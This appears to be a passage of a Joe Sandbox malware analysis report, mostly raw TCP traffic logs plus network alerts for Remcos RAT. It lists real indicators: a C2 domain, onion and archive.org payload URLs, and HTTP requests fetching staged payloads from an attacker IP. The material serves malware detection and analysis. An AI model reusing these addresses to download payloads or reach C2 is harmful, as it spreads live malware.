                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 207.241.224.2:443 -> 192.168.2.22:49162

                  Networking

                  barindex
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49165 -> 45.89.247.65:2201
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49164 -> 45.89.247.65:2201
                  Source: Network trafficSuricata IDS: 2020423 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1 : 85.239.241.184:80 -> 192.168.2.22:49163
                  Source: Network trafficSuricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M1 : 85.239.241.184:80 -> 192.168.2.22:49163
                  Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE Malicious Base64 Encoded Payload In Image : 207.241.224.2:443 -> 192.168.2.22:49162
                  Source: Malware configuration extractorURLs: dremom2.duckdns.org
                  Source: powershell.exe, 00000007.00000002.364796787.00000000026B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: pohttps://archive6zg5vrdwm4ljllgxleekeoj43lqayscd4d4kmhnyblq4h3ead.onion/download/new_image_vbs/new_image_vbs.jpg
                  Source: powershell.exe, 00000007.00000002.364796787.000000000269E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Onion-Location: https://archive6zg5vrdwm4ljllgxleekeoj43lqayscd4d4kmhnyblq4h3ead.onion/download/new_image_vbs/new_image_vbs.jpg
                  Source: unknownDNS query: name: dremom2.duckdns.org
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 45.89.247.65:2201
                  Source: global trafficHTTP traffic detected: GET /download/new_image_vbs/new_image_vbs.jpg HTTP/1.1Host: archive.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /35/WERFFG.txt HTTP/1.1Host: 85.239.241.184Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                  Source: Joe Sandbox ViewIP Address: 207.241.224.2 207.241.224.2
                  Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
                  Source: Joe Sandbox ViewASN Name: INTERNET-ARCHIVEUS INTERNET-ARCHIVEUS
                  Source: Joe Sandbox ViewASN Name: CMCSUS CMCSUS
                  Source: Joe Sandbox ViewASN Name: CASABLANCA-ASInternetCollocationProviderCZ CASABLANCA-ASInternetCollocationProviderCZ
                  Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
                  Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.22:49166 -> 178.237.33.50:80
                  Source: global trafficHTTP traffic detected: GET /35/wescreenthepicturewithbuttersmoothpy.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 85.239.241.184Connection: Keep-Alive
                  Source: unknownHTTPS traffic detected: 207.241.224.2:443 -> 192.168.2.22:49162 version: TLS 1.0
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.239.241.184
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.239.241.184
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.239.241.184
